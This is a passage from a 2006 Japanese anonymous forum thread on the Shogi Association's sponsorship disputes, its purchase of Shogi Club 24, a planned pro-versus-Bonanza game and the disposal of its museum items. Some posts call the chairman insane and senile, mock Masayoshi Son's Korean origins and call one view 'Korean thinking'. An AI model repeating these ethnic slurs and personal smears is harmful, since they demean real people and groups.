秀行先生が理事長なら、滅茶苦茶なことは言ったかも知れないが(若い頃は棋院の理事として辣腕を
ふるったらしいが)、スポンサーとの関係がここまでこじれたりしないし、何かあってもまわりが率先して
助け船を出してくれる筈。

463 :名無し名人:2006/11/13(月) 01:10:04 ID:uuOmOLc4
http://www.yonenaga.net/w_syogi.htm
>将棋倶楽部24
> これが本当の話なのです。困り果てた私はサクセスという会社の社長が共通の友人でしたので、
>仲介役を頼みました。金額は公表しませんが、一応は買い取ったのです。タダ同然で申し訳ない。

> 私は一人でも多くのファンに楽しんで対局していただけるように、無料維持が信念です。
>「米長先生が好きです」という人が多ければ無料。あんな男は駄目だという人が多ければ有料にします。
>冗談、冗談。

さわやか日記
http://8154.teacup.com/yonenaga/bbs
>「将棋倶楽部24」を競売すれば20億円くらいの高値がつくのではと思います。


金、金、金、・・・・・・。
米長批判の声が高まれば24を有料化するだって?
冗談だと断われば何を言ってもいいってものではない。

464 :名無し名人:2006/11/13(月) 10:50:50 ID:8OErG6fO
>米長「このサイトを日本将棋連盟で運営したい」

ほんとに※はクレクレ厨だな。
もらったはいいけど、育てないのが※流。


465 :名無し名人:2006/11/13(月) 17:25:28 ID:3LpLr6Ja
名人戦騒動通してずっと「棋戦よりツカミ金」って方針だったが、
24を買うための金が欲しかった、ならまあましなほうだろう。
もっともNSNとくっつけてNSN問題を解決する為かもしれないが。
NSN問題まとめページ
ttp://game9.2ch.net/test/read.cgi/bgame/1147976161/

466 :名無し名人:2006/11/13(月) 20:38:50 ID:NixKbiLR
有料で魅力的なサービス始める力が連盟にあったらとっくにNSNでやってるだろ。

467 :名無し名人:2006/11/13(月) 20:53:52 ID:LhvbqoFR
>>466
一言で核心突きますね。


468 :名無し名人:2006/11/13(月) 21:00:25 ID:FdPXPYlz
連盟が介入した時点で、24の良さは全て崩れ去るだろうね。

469 :名無し名人:2006/11/13(月) 21:09:56 ID:iL3eTdLI
20億円って、んなアホな。

この手の集客力のあるサイトで比較的小規模な物は
日本でも結構すでに売買されていて、相場とかあったりするのよ。
自分の知り合いもまさに買われたほうだったりするのだが、
売買額=ページビュー×広告価値+中の人の能力(年俸)
(中の人が買った会社の従業員として一定期間面倒見るのが条件として付く)
で、相当シビアな査定をされてた。

ライブドアが元気な2年くらい前が相場が一番高かったはずだけど、その頃に売らなかったのは……。
連盟の財布具合からすると、ウン千万は絶対払ってないと思うのだけれども、
もし2年くらい前ならウン千万(中の人のギャラ抜きで)を払ってくれるところもあったろうに。

470 : ◆1py37ZPJ9A :2006/11/13(月) 21:22:43 ID:krhFwbRu
普及協力金とか安くてもいいから、
王将戦はなんとか残してくれ。


471 :名無し名人:2006/11/13(月) 21:31:28 ID:meaTZtE0
朝日も毎日もどこの新聞も金なんて要らないから
無料中継をがんばってほしい

472 :名無し名人:2006/11/13(月) 21:40:46 ID:9wwREW7t
羽生が永世王将取った時点で終了でいいよ。
ていうか毎日完全撤退してほしい。

473 :名無し名人:2006/11/13(月) 21:49:36 ID:FrKSARCk
>>469
20億円ねぇ。
これが、今年の2月なら、例のほら吹きが始まった、という反応だったろう。
それが、4〜5月頃で「ひょっとしてマジでそう考えてんの?」に変わり。
今となっては、「ああ、あの基地外のことだから本当にそう考えてるんだな。」まで来た。

ということで、
名人戦に6億以上の価値があると本当に信じ込んでいるんだろうな。
「お可哀想に・・・、悪化しない内に然るべき病院に入れた方がいい」というレベル。
凸以下、亦同じ。

474 :名無し名人:2006/11/13(月) 22:00:25 ID:FdPXPYlz
もう、病人の好きにさせてやろうぜ・・・
あとのことは知らん

475 :名無し名人:2006/11/13(月) 23:17:22 ID:5OFDux9j
> 理事会へのプレゼントです

これって、ものすごく不自然な言葉だよね。

「将棋界」へのプレゼント、「将棋連盟」へのプレゼントというなら分かる。
また、※へのプレゼントというのもありだと思う。

でも、「理事会」へのプレゼントなんて事は、まず言わない。

どうして、すぐバレる嘘をつくんだろうね。

476 :名無し名人:2006/11/13(月) 23:24:14 ID:MaYmHWYJ
>>473
名人戦が6億以上で契約されたら病気なのは誰?

477 :名無し名人:2006/11/14(火) 00:51:28 ID:062VHOHX
ついに170万を入札したやつがでた。

478 :名無し名人:2006/11/14(火) 02:11:16 ID:5HDmbDPp
http://page3.auctions.yahoo.co.jp/jp/auction/c126054144
今入札している奴も購入履歴を見る限りでは買う気があるのか分からんな。

で、『榧七寸盤&掬水作盛上駒セット』
というのは【全タイトル保持者自筆署名入り】 が無かったら幾ら位が相場なのかね?

479 :名無し名人:2006/11/14(火) 04:07:17 ID:iqhvS+aw
盤5〜60万駒2〜30万くらいじゃないかな?
物自体は良さそうなのでもう少し高いかもしれん


480 :名無し名人:2006/11/14(火) 13:43:11 ID:xINuCsvD
>>476
そんな一行で嫌味をつけてる気になってるのかよw

481 :名無し名人:2006/11/14(火) 13:59:27 ID:RkLMj8tx
>>480























482 :名無し名人:2006/11/14(火) 15:20:27 ID:2n08ChC8
>>469
業界に詳しいようだから聞くけど、何か例を挙げて下さい。

NSNをどうするかって問題だが、
巧く行っている会社が巧く行っていない(設備や人員を浪費している)会社を買収して、
巧く行っている会社の経営陣が巧く行っていない会社を経営するならわかる。
NSNと24の関係は逆だから、相当にトンチンカンなことになりはせんか?

483 :名無し名人:2006/11/14(火) 15:35:46 ID:4NAP23q0
24買収の話はよそでやってくれないか?

484 :名無し名人:2006/11/14(火) 16:52:01 ID:sCFg8S8F
それよりもMSN問題とか言うのこそどっかでやって欲しいな
MSN問題ってなんなのかと>>465のスレ少し読んだが、2chの
書き込みだけを根拠に必死に騒いでるだけだった。
まぁここのスレと非常に空気は似てるが。

こんなスレで嫌な気持ちになるより、竜王戦第3局を酒のつまにに楽しもうぜ
http://game9.2ch.net/test/read.cgi/bgame/1162378075/l40

485 :名無し名人:2006/11/14(火) 18:13:21 ID:orwD3g7M
マイクロソフトネットワーク

486 :名無し名人:2006/11/14(火) 20:40:32 ID:2YYoZp4y
>>475
嘘っていうか、24を安く買ったことを「美談」に仕立て上げたかったんだろ。
※が思いつく美談は、せいぜいあの程度。

487 :名無し名人:2006/11/14(火) 22:27:50 ID:S/S5ZcpY
>>486
「連盟」へのプレゼントとかなら、確かに美談になる。

でも、「理事会」へのプレゼントとなると、とたんに胡散臭くなる。

488 :名無し名人:2006/11/14(火) 22:46:24 ID:nwevXfVZ
最近ますます某国のニュースじみてきたよな

489 :名無し名人:2006/11/14(火) 23:25:56 ID:2YYoZp4y
※の頭の中では、理事会も連盟もいっしょだから、いいんだよ。

490 :名無し名人:2006/11/15(水) 18:37:10 ID:YTCE2VVJ
先週予告されていた重大発表は24だった、まあ確かに大きかった。
で、本命の将棋の日の重大発表ってのは何だろう。

491 :名無し名人:2006/11/15(水) 20:49:59 ID:Oklg+nce
>>488
※正日

492 :名無し名人:2006/11/15(水) 20:56:55 ID:Z/zQSyGN
重大発表=24て・・くだらんな。
重大発表てこの程度のことを言うのか?w

493 :名無し名人:2006/11/15(水) 22:51:02 ID:i6vlvNjS
>>492
俺たちにとっては名人戦問題より重大だ。

494 :名無し名人:2006/11/16(木) 00:24:49 ID:BGnRAJfw
おおざっぱだが、週刊将棋=24=20万人、くらいだから、
将棋に小金を使う層というかライトユーザーにとって重大だったな。
で、明日の重大発表ってのはやはり名人戦に関して?

495 :名無し名人:2006/11/16(木) 08:57:32 ID:u9DTHc6a
不正経理が発覚して誰か懲戒免職

496 :名無し名人:2006/11/16(木) 20:22:06 ID:5o0OKJzf
米長邦雄 投稿日:11月16日(木)17時21分38秒
やっぱり将棋漬けの一日でした。
明日午後1時半に都内マンダリンホテルにて私も記者会見。
4月1日から始まるインターネット放送局の新番組についてです。
一人でも多くの人に番組を観てもらいたいので無料です。ネットは無料が鉄則。ただし、それとは別に課金による楽しい企画は考えます。
今朝7時半にTBSラジオで私が数分インタビューに答えました。

ありゃ、将棋の日なのに都内でインターネットについて会見か。
まあ8億ふっかけたからには簡単にはまとまらんわな。

497 :名無し名人:2006/11/16(木) 22:50:16 ID:a1enniv0
ここからアンチ連盟、いつものイチャモンが始まります
↓↓↓

498 :名無し名人:2006/11/17(金) 03:01:44 ID:kGQ9rgNz
.   ∩____∩: :.+
ワク. | ノ      ヽ+.:
:.ワク/  ●   ● | クマ
  ミ  '' ( _●_)''ミ クマ
. /  ._  |_/__ノヽ 
 -(___.)─(__)─

499 :名無し名人:2006/11/17(金) 03:16:48 ID:5wpE/PjL
じつは朝日も当て馬で※の狙う本命はヤフーなのかもな
ソフトバンクなら8億が10億でもはした金だろうし
10以上あるプロ野球チームの1つをもつより名人戦を独占主催するほうが
企業イメージアップの効果がありまっせ
と※が吹き込めば孫がその気になる可能性なきにしもあらず

500 :名無し名人:2006/11/17(金) 06:10:35 ID:rvQTCQzd
彷徨えるコメジョンイル
結末は如何に

501 :名無し名人:2006/11/17(金) 10:33:14 ID:uY4aOL7K
甘い、ソフトバンクも携帯事業が予想以上に不振だろうしこれから大変だ。


502 :名無し名人:2006/11/17(金) 11:25:47 ID:X7pAfEoH
将棋と組んで企業イメージアップになるんだろうか。
若年・女性層にアピールできるものでもないし。
新聞社にしてもコンテンツの一つとして隅っこで扱ってるだけだよね。
他社へのメンツもあっての継続だろうしさ。

プロ将棋を楽しむ人が減って、そのコンテンツとしてすら危ういわけだし。

503 :名無し名人:2006/11/17(金) 12:02:08 ID:OaWOd7ug
昔は、中原なんかテレビのCMにもよく出ていたじゃないか。
もっと棋士の人間的な魅力を全面に出したらどうだ。

504 :名無し名人:2006/11/17(金) 12:23:43 ID:HAfTPdlK
>>502
何言ってるんだ?
将棋人口で一番多い年代は10代だろーが

505 :名無し名人:2006/11/17(金) 12:32:14 ID:HAfTPdlK
将棋人口約700万人のうちの1/3が10代

10代限定の競技人口なら

将棋:囲碁=9:1

506 :名無し名人:2006/11/17(金) 12:35:42 ID:X7pAfEoH
>504
書き方が悪かったけれど、いまの将棋のイメージは、
一般的な若い層にアピールできるものではないでしょう、ということでした。

ソフトバンクがキャメロン・ディアスを使う、
それは彼女がもっているイメージを利用しているということ。

507 :名無し名人:2006/11/17(金) 13:33:55 ID:K7TMnY7w
>>499
孫はけちだぞw
いや、それは成功している経営者なら当たり前のこと。
徹底したマーケティングで損益計算を割り出している。
必要とあらばいくらでも注ぎ込むが、不必要なものにはびた一文払わん。
じゃあ将棋はどっちか、ってか?まあ、後者でしょうね。
第一、米なんかじゃ、その持ちかけの話もできないよ。申し訳ないが、痴呆症患者扱いだね。

ただ、孫は中国人、囲碁の方には、多少、興味を持つかもしれないな。

508 :名無し名人:2006/11/17(金) 13:38:09 ID:VjywCo+m
>>507
羽生とのネット対局とかでもう一文以上は払ってるだろう。

509 :名無し名人:2006/11/17(金) 13:58:42 ID:K7TMnY7w
連続カキコ失礼。
もし、孫が将棋に注目したと仮定する。
そのときの戦略は、欧米、東洋を問わず世界中の人を相手に将棋中毒を増やす。
チェスに匹敵する、いや、チェスよりも面白いゲームが不思議の国日本にあるという売りでだ。
【第一段階】とりあえず、外国では適当な相手が居ないので将棋ソフトの現地語訳版を普及させる。
      解説本の現地語版をドンドコ提供する。ソフトに入門用の機能を充実させる手もある。
      こんなんは、簡単な企業買収でできる。どのソフトが選定されるかは分からん。        
【第二段階】そして、外人でもアクセスが容易な(言語問題を克服した)WEB将棋道場を開設する。
      日本の主な棋戦中継もそこを通じて行う。
      WEB上でアマ国際大会を開催する。とんでもない天才少年が出るかもしれない。
      日本の一流棋士もたじたじになるようなセミプロが出てくる可能性は充分にある。
      (東ヨーロッパやインド辺りが候補かな?)
【第三段階】メジャーな国際大会の開催に至る。もちろん賞金は破格だ。
      地区大会から本大会まで、エンターテイメント性の高いものを演出する。

まあ、こんなことを妄想してみる。
将棋盤とか将棋の駒なんかの売上も馬鹿にならないなぁ。
ヨーロッパでは、ジャパニーズ・アンティークになるから。
(もちろん、漢字をそのまま使用だぞ。英文字にするなんて馬鹿な真似はしない。
欧米では、漢字そのものが売り物になるんだから。)

その暁には、日本将棋連盟なんか、吹っ飛んでるよ。
まあ、ただの日本支部として存続できるかどうか?
柔道における講道館の存在とは行かないだろうね。
プロ棋士達に哲学がないから。     

510 :名無し名人:2006/11/17(金) 14:18:17 ID:ucw1ll52
>>509
チラシの裏でたのむ

511 :名無し名人:2006/11/17(金) 14:50:41 ID:ABxTsfk7
必死になって普及協力金手に入れても理事選でおちて※の思うように
使えなかったら、笑えるんだが・・

512 :名無し名人:2006/11/17(金) 16:06:12 ID:6EQj9ZYi
あの会長じゃむりでしょう。所詮日本限定ですから。

513 :名無し名人:2006/11/17(金) 16:44:58 ID:l1kfDhR1
362 名前:名無し名人 投稿日:2006/11/17(金) 16:29:59 ID:ZrQBLsX7
日本将棋連盟 初のネット棋戦「大和証券杯ネット将棋棋戦」開催のお知らせ
ttp://www.daiwa.jp/press/20061116131552.cfm

このたび、日本将棋連盟では、将棋連盟主催では初となりますインターネット上で
プロ棋士が対局するネット棋戦「大和証券杯ネット将棋棋戦」を2007年4月より
スタートさせることになりました(特別協賛:大和証券グループ)。



なお、大和証券杯の開催に先立ち2007年3月21日に大和証券杯特別対局として
「渡辺竜王vsボナンザ」戦を公開対局にて実施いたします。

対局内容:公開対局 平手一番勝負 ボナンザ先手
      持ち時間 2時間 (チェスクロック使用)/切れたら1手1分

514 :名無し名人:2006/11/17(金) 17:10:13 ID:E0LONwlP
コンピュータとは一局一億とか言っていたが、
「大和証券杯ネット将棋棋戦」全部で一億ってとこだろうか。
毎日を絡めずに大和証券との仕事を取ったのは連盟側にプラスかな。
仮に朝日単独でも名人戦に協賛してくれそうな感じ。

515 :名無し名人:2006/11/17(金) 17:17:22 ID:SkaZPqBj
>>513
対ボナンザ戦を竜王にやらせるのか。
驚いたね。
大丈夫だとは思うが、万が一ということもあるんだから、こういう勝って当たり前の
お好み対局は米長永世棋聖が出ればいいと思うんだが。

渡辺竜王には失礼な言い方になってしまうが、
名人戦遺憾問題や24買取で米長会長が悪目立ちしているから
「米長vsボナンザ」のほうが世間的には注目を集めるだろうし、仮にボナンザが勝っても、
米長会長は引退棋士だから将棋連盟の看板に傷が付くこともないのだが。

516 :名無し名人:2006/11/17(金) 17:26:21 ID:xDM3RWjm
渡辺なら大丈夫だろ。
というか、渡辺が万一負けるようだと、ボナはA級棋士レベル。
さすがに、それはないだろう。


517 :名無し名人:2006/11/17(金) 17:26:49 ID:HTONnz9d
>>514
どうせ来年には渡辺前竜王になってるから問題なし


518 :名無し名人:2006/11/17(金) 17:46:54 ID:ABxTsfk7
負けるとまずいよ。ほとんどの棋士が
コンに負けるという見方をされてしまうだろうからね。
米長がでりゃあいいんだよ。負けても、ああやっぱり・・ですむじゃん。

519 :名無し名人:2006/11/17(金) 18:01:10 ID:m1W497g4
ほう、いよいコンピュータ対局やるのか
まあこういうのは若手の方が詳しいだろうから渡辺は適任じゃね

520 :名無し名人:2006/11/17(金) 21:01:09 ID:jELCVw7P
>>513
いい試みだねぇ
新聞社に頼りきりではいけないからね。
これを機に棋譜再生のグラフィックス改善等が進むと嬉しい。
まだ本人確認とか、対局者がソフトを使用しないかなどの疑問点は
あるけど、なにはともあれ最初の1歩を踏み出したことは大きい。

521 :名無し名人:2006/11/17(金) 22:48:56 ID:H1PRrItu
今頃読売新聞は怒り心頭に・・・

522 :名無し名人:2006/11/18(土) 00:00:53 ID:JRDVWpZV
渡辺が負けると思ってる奴がいることに驚きw
渡辺はおろか、米長が指しても勝負形すら作れないよ。

523 :名無し名人:2006/11/18(土) 00:39:03 ID:zsr0IjGW
角引いた森内に完敗だもんな。
まだまだ平手では勝負になるまい。あと数年はかかる。

524 :名無し名人:2006/11/18(土) 04:56:04 ID:I2FX8VR0
渡辺なら嫁が詰みをボナンザで探してくれるだろ

525 :名無し名人:2006/11/18(土) 05:07:39 ID:FbJ2LfDD
>>523
>まだまだ平手では勝負になるまい。あと数年はかかる。

逆に言うと、あと数年でフリーソフトでも当代のトップ棋士と平手で勝負になる
ところに行きそうな感じなんだよね。
チェスのグランドチャンピオンを破ったディープスロートはチェス専用のスーパーコンピュータだったが、
あと数年で、パソコンソフトが日本将棋のグランドチャンピオンと互角かそれ以上の実力となったとき、
プロ棋界はどう存続してゆくのか興味深いよ。
急に業界として成り立たなくなることはないだろうが、プロ同士の対局でも中座厳禁とか対局日に
将棋会館内でケータイ所持していたら厳罰とか、人間同士の対局の運営にも影響が出てきそうだ。
詰みはボナンザが探してくれる、というのは今はまだ洒落ですんでいるけど、じきに深刻な問題になる。

526 :名無し名人:2006/11/18(土) 05:23:36 ID:27XEyfeD
ところがソフトはプレッシャーも感じないし疲れないんですよ
まだまだ弱いけど確実にプロ敗北へのカウントダウンは進んでいる

527 :名無し名人:2006/11/18(土) 06:22:04 ID:ra3TM31T
米長老けたねー。

528 :名無し名人:2006/11/18(土) 06:52:23 ID:Rny17rXo
>>525
ディープスロートではない。

529 :名無し名人:2006/11/18(土) 06:59:38 ID:FbJ2LfDD
>>528
そこ突っ込むとオエッとなるからダメ。

530 :名無し名人:2006/11/18(土) 08:08:08 ID:tBGKguWw
そういや、機械側は何になるんだ。チェスもそうだが、本来機械側の宣伝なんだから。
NECとの関係からNECのスパコンじゃないかって話はよくあったが、
ボナンザとなると一般に発売されてるハイエンドモデルあたりか。
優勝した時より少し強い位じゃね。

531 :名無し名人:2006/11/18(土) 10:16:10 ID:2Zmmosrk
今のソフトレベルでもディープブルー並みのスーパーコンピューターを使って
研究したら、結構A級レベルには到達しそうだけどな。
NEC辺りがコンピュターの宣伝のために大量の資金を飯田教授辺りに投入
したらA級プロも吹っ飛ぶようなソフトが出来そうだ。
漏れは将棋のソフトがチェスに比べて相対的に弱いのではなく、投入資金が
圧倒的に少ないから弱いと見ている。


532 :名無し名人:2006/11/18(土) 10:31:19 ID:legFJrGy
ディープスロートって有名ポルノ or 大統領の陰謀。
グランドチャンピオンでもない。

森内の角落ちと今度の平手ではデータベースの充実度も違いそうだ。
森内は中盤以降は別人と言ってたね。

スパコンでいうと、提供側にすれば、もう将棋にそれを使う時代じゃないような。
チェスのときは意味があったけどさ。

533 :名無し名人:2006/11/18(土) 14:28:13 ID:tBGKguWw
渡辺が竜王失ったらどうする、と思ったが、
よく考えると大和証券杯の優勝者が対戦すべきのような気がしてきた。
来年からそうなるかもしれないが、そちらをきちんと明記すべきなような。

なんにしろ大和証券が新聞社以外でもスポンサーになったことは、
名人戦に関してもプラスだ。大和の撤退を考えずに済む。

534 :名無し名人:2006/11/18(土) 14:50:09 ID:b1fpCymV
米はスカトロプレイでも楽しんどけ。

535 :名無し名人:2006/11/18(土) 22:32:28 ID:TH4/0SLb
勝って当たり前の勝負に渡辺を出すのは、
名人戦騒動の意趣返しだな。

相変わらず※のやる事は陰湿だ。


536 :名無し名人:2006/11/19(日) 00:19:04 ID:/DCxJSpu

囲碁の新聞・テレビ棋戦以外のプロ棋戦

「NECカップ囲碁トーナメント戦」(1981〜)
http://nec-igo.com/
「世界囲碁選手権富士通杯」(1988〜)
http://jad.fujitsu.com/event/2006/igo/
「リコー杯プロ棋士ペア碁選手権」(1994〜)
http://www.pairgo.or.jp/RICOH/index.htm
「阿含桐山杯」(1994〜)
http://www.nihonkiin.or.jp/kisen/kiriyama/
ドコモ杯女流棋聖戦(1998〜)
http://www.nttdocomo.co.jp/corporate/csr/social/culture_sport/master_go/index.html
東京精密杯女流プロ最強戦(1999〜)
http://www.nihonkiin.or.jp/kisen/fsaikyo/008.htm
CSK杯囲碁アジア対抗戦(2002年〜)
http://www.nihonkiin.or.jp/kisen/csk/
トヨタ&デンソー杯 囲碁世界王座戦(2003年〜)
http://hobby.nikkei.co.jp/igo/sekai/
「大和證券杯ネット囲碁オープン」(2006〜)
http://u-gen.nihonkiin.or.jp/daiwa/001/
「広島アルミ杯若鯉戦」(2006〜)
http://www.chugoku-np.co.jp/News/Tn200611060090.html

537 :名無し名人:2006/11/19(日) 00:23:09 ID:vrwuCVU8
将棋と囲碁では状況(ファン層)が違う。
囲碁はファンは少ないけど、パトロンがいる。


538 :名無し名人:2006/11/19(日) 03:36:19 ID:/DCxJSpu
>>537
それはどうかな。
将棋は駒の動かし方を知っているだけの人間もすべてファンにカウントしているだけで、
金払って囲碁教室・指導碁へ通ったり、日本棋院ネット対局「幽玄の間」の有料会員になったり、
囲碁書籍をいっぱい買ったりする「熱心なファン」は囲碁の方が多いじゃないかな。

539 :名無し名人:2006/11/20(月) 10:24:14 ID:P0VUPR67
囲碁将棋チャンネルで、囲碁の女性は美人が多い
で、囲碁の事はわからんが、俺は「熱心な女性棋士ファン」だ。

540 :名無し名人:2006/11/20(月) 11:06:41 ID:Hl2rt9W6
大和証券杯ってネット中継するの?

ただなの?

541 :名無し名人:2006/11/20(月) 11:52:54 ID:NihAobsg
>>538
それは同意。しかし、囲碁・オセロ板の過疎ぶりはかなり深刻だろう。
将棋も普段は大差ないかもしれんが、タイトル戦の時は凄いからね。

542 :名無し名人:2006/11/20(月) 11:55:29 ID:tXV6Pfez
もはや、将棋名人戦の注目度は
オセロ名人戦を越えたといってよい。

543 :名無し名人:2006/11/20(月) 13:30:45 ID:5rAVhay2
>>542
いや、あ

544 :名無し名人:2006/11/21(火) 19:46:14 ID:tjXXRotf
「先日、日本将棋連盟より提示しました契約金ほか総額についても、
おおむね了承されたことに感謝いたしております。」

の一文が、朝日、毎日に否定されたあとも、ずっと残っているね。
随分傲慢な組織だ。

545 :名無し名人:2006/11/21(火) 20:08:42 ID:MBFqLwpO
確かに囲碁は美人が多いな。
将棋のしょんべんくさい女流とは大違いだな。

546 :名無し名人:2006/11/21(火) 20:39:21 ID:XV00Zk00
>>545
つ 林葉直子

547 :名無し名人:2006/11/22(水) 02:51:37 ID:UW5Fwysi
>>507
亀レスの上にスレ違いで申すわけないが、孫って中国系だったの?
漏れはてっきり在日だとばっかり思ってたんだが・・・

548 :名無し名人:2006/11/22(水) 03:19:05 ID:TULH02wd
>>535
大名人戦で格の下がる読売のご機嫌取りだと思われ

549 :名無し名人:2006/11/22(水) 03:28:11 ID:EmR+Sm86
>>547
帰化しているから日本人

550 :名無し名人:2006/11/22(水) 03:56:50 ID:UW5Fwysi
>>549
そうじゃなくてオリジンのこと
半島系?大陸系?台湾系?

551 :名無し名人:2006/11/22(水) 04:41:12 ID:sKpTiukA
>>550
半島系でおk。

552 :名無し名人:2006/11/22(水) 09:17:03 ID:vnzvN6oQ
>>550 ややこしいが、
中国系朝鮮人(祖先が中国から半島へ移住)=>在日=>帰化して日本国籍

553 :名無し名人:2006/11/22(水) 12:24:33 ID:fcZ/Igqc
孫が学生時代は「安本」姓を通名としてたはず

まあどうでもいいが

554 :名無し名人:2006/11/22(水) 15:12:28 ID:NrrC+d/q
朝鮮系日本人でしょ

555 :名無し名人:2006/11/22(水) 17:13:44 ID:M8kJ7ds8
>>551-554
サンクス

556 :名無し名人:2006/11/22(水) 17:24:11 ID:fPUN87/w
http://bbs.2ch2.net/test/read.cgi/fusianasan/1164017690/in
二次元研究会です!なにか書き込んでください!
始めたばかりですが・・・・



557 :名無し名人:2006/11/22(水) 19:04:59 ID:IW6dmXI0
二宮: 読売からすると毎日に名人戦を持ち続けてもらって、契約金が上がらないようにした方が得策ということでしょうか?
田中: 将棋連盟の理事会が悪者にされてしまった理由は、そこにある気がします。「将棋文化の象徴である名人戦は、
毎日が主催したほうが将棋界や日本文化のためにいい」と思って記事を書いた記者は、ほとんどいなかったのではない
でしょうか。事実確認に問題があったり、本質をすり替えたり、読者に誤解を与える内容や見出しがかなりありました。

二宮: 最もステータスの高い名人戦の値段が低位で安定してくれると、各新聞社が主催している棋戦の契約金が値上がりしないと
いう図式になっている。理事会はこの構造を崩したいわけですね?
田中: それが将棋界の悲劇の根本にあります。将棋連盟の理事会はその根本に手をつけようとした。

――新聞社の言いなりにはならないぞ、と決起したわけですね。
田中: われわれは自らが生き残り、多くの将棋ファンにプロ将棋をより楽しんでいただくために、当たり前のことをしたつもりですが、
そのように受け取られたようです。
二宮: 客観的に見て、名人戦の契約金は高いのでしょうか? そこは一般の人にはわかりにくい。

田中: じつは、今回の件は外部の識者で構成した経営諮問委員会に諮っています。それで@毎日に棋戦が二つあるのはよくない。
しかもA名人戦と王将戦という三大棋戦の二つが毎日にあるのは問題だ、という答申をもらった。それで名人戦を、タイトル戦を行っていない
朝日に持っていっては? という話になった。朝日は囲碁の名人戦を持って、待っているので相談してみよう、となったのです。

――経営諮問委員会の話は、ほとんど報じられていませんね。
田中: 諮問委員に取材に行った記者たちは、面白くないので書くのをやめたみたいですね。

ttp://www.ninomiyasports.com/xoops/modules/news/article.php?storyid=6069

558 :名無し名人:2006/11/22(水) 19:16:04 ID:IAqXD8GX
将棋連盟お宝放出のトホホ…国宝級含む1000点以上
財政難で博物館管理できず
http://www.zakzak.co.jp/top/2006_11/t2006112218.html

559 :名無し名人:2006/11/22(水) 19:25:51 ID:JaLJtDkN
>>558
情けないというか、みっともない話だねえ・・・



560 :名無し名人:2006/11/22(水) 19:33:33 ID:Cy6NF2SK
棋士のリストラを全くやらずに、
国宝級の盤駒を手放すとは、全く本末転倒。

関西会館なんか抵当に入れても、こういうものは守んなきゃダメだろう。
連盟としての正当性を主張するよりどころにもなるのに。

ウンコ棋士にどれだけの値打ちがあるんだよ・・・・

561 :名無し名人:2006/11/22(水) 19:44:01 ID:JaLJtDkN
>>560
連盟の運営はだらしがないが、棋士よりも盤駒を上におくとはそれこそ本末転倒だ
財政的には棋士のリストラも必要かもしれないが、棋士は棋士、
国宝級といえど盤駒はしょせん物
将棋でもっとも価値があるのは才能だよ

562 :名無し名人:2006/11/22(水) 19:55:41 ID:ZjytmZID
ウンコ棋士も羽生もそれぞれ一票だからなぁ・・・

563 :名無し名人:2006/11/22(水) 20:09:46 ID:XEbPShRx
棋士の給料を1%ずつ徴収するだけで
保存できたはずなのに。
次は何を手放すかな。

564 :名無し名人:2006/11/22(水) 20:32:42 ID:wuKP2yC/
ファンを手放します

565 :名無し名人:2006/11/22(水) 20:53:28 ID:yVRjRwBZ
>>561
文化財の保有にそんなに金がかかるとも思えない
文化が残らない朝鮮人的考え方なんだよなあ

将棋は日本の文化というのは建前で、とにかく金よこせが連盟の体質


566 :名無し名人:2006/11/22(水) 21:35:58 ID:jEBH2B53
維持費っていくらくらいなんだ?


567 :名無し名人:2006/11/22(水) 22:33:36 ID:M8kJ7ds8
>>565
それが※正日クォリティー

568 :名無し名人:2006/11/22(水) 23:18:22 ID:vb7W6hAO
まあ何にせよ、互助会と化している連盟を公益法人と認めてやれる唯一の理由が、
将棋博物館を運営していたことと言ってもいいくらいだからな。
寺が国宝を守るために拝観料を取り、公園が自然を守るために入場料なりを取る。
実際は寺の人間が生活するため、公園に天下りしている元官僚を養うためではあっても、
国宝を維持する、大衆に自然に親しむ機会を与えるという建前があるからこそ、
多少のことはしかたないかということになるのだが・・・。

569 :名無し名人:2006/11/23(木) 07:18:00 ID:XI4jLuhA
それで名人戦を、タイトル戦を行っていない
朝日に持っていっては? という話になった。

世の中の常識では、一言毎日新聞に断りを入れるものです。
それをいきなり契約打ち切りの文書の郵送。
将棋馬鹿は氏ね。

570 :名無し名人:2006/11/23(木) 09:02:40 ID:ZBmZTjtP
棋士のリストラもしないで基地外の集まりだわ連盟

571 :名無し名人:2006/11/23(木) 09:13:06 ID:YtzTx6xi
40以上でC級はクビってルールにしろ

572 :名無し名人:2006/11/23(木) 10:23:12 ID:JYe4pLBZ
米長企画

東京惨惨惨苦※※苦苦

573 :名無し名人:2006/11/23(木) 11:07:16 ID:AU1JvrX9
会長だけでなく、寅をはじめとする理事会全部が狂っているのは明白。
こういう理事をのさばらせている棋士全員も同罪。
連盟は一旦解散して0からやり直すほうがいい。

574 :名無し名人:2006/11/23(木) 11:32:01 ID:2jfq52vb
>>561
「今の」盤駒じゃないからね。
歴史や先人の営為にたいする敬意が感じられないよ。

博物館は閉鎖するとしても、モノ自体は手元において、
HP上での公開、研究者への閲覧など、出来ることはあるだろう。

棋士のリストラはやらないが、職員は切ってるんじゃないのか?

あるいは、棋士を切らなくてもベースになる給料を下げるなどのやり方で
保管費ぐらい捻出できなかったのか?


575 :名無し名人:2006/11/23(木) 12:35:59 ID:ZRNzAxIv
>棋士のリストラはやらないが、職員は切ってるんじゃないのか?

そのとおり。少なくとも関西では。
信望の篤かった職員が突然やめた。



576 :名無し名人:2006/11/23(木) 16:07:01 ID:Q+R6av+W
女と手を切るときに「別の女ができたから別れてくれ」って
言ってるようなもんだよな。
しかもそれが前の女房とよりを戻そうってんだからややこしい。
しかも今の女房もよりを戻した仲だという・・・


577 :名無し名人:2006/11/23(木) 16:32:27 ID:gswneTUl
寅の息子は退会寸前だが
これだけ協力してるんだから息子を連盟の職員に・・
とでもいいだすんじゃねえか?w


578 :名無し名人:2006/11/23(木) 16:47:21 ID:Z05U8FN9
国宝級の盤駒を売りに出し
金優先の名人戦問題
米長に文化うんぬん、教育うんぬんを言う資格はない。

東京都議会でも、こういう切り口で質問したら、知事も困るだろうに

579 :名無し名人:2006/11/23(木) 18:20:10 ID:JvhOkWXZ
>>578
>国宝級の盤駒を売りに出し

こりゃあ驚いた。
各種報道では大阪商業大学に「寄贈」となっていますが、
国宝級の盤駒は本当は売りに出されていたのですか?
もっと詳しく。

580 :名無し名人:2006/11/23(木) 18:22:28 ID:GG7uJ4ti
ソースもない脳内妄想を真に受けないようにw

581 :名無し名人:2006/11/23(木) 18:37:41 ID:JvhOkWXZ
収蔵品目録さえ作成できないまま「寄贈」という形で放り出そう
というんだからね、どさくさ紛れに貴重品のうち何点かがこっそり「売りに出されて」
闇に消えるというのもありえない話ではないですよ。
さすがに国宝級の盤駒が紛失するとは思いづらいが
今の将棋連盟理事会を見ているとどんな非常識なことが起こっても驚かない。

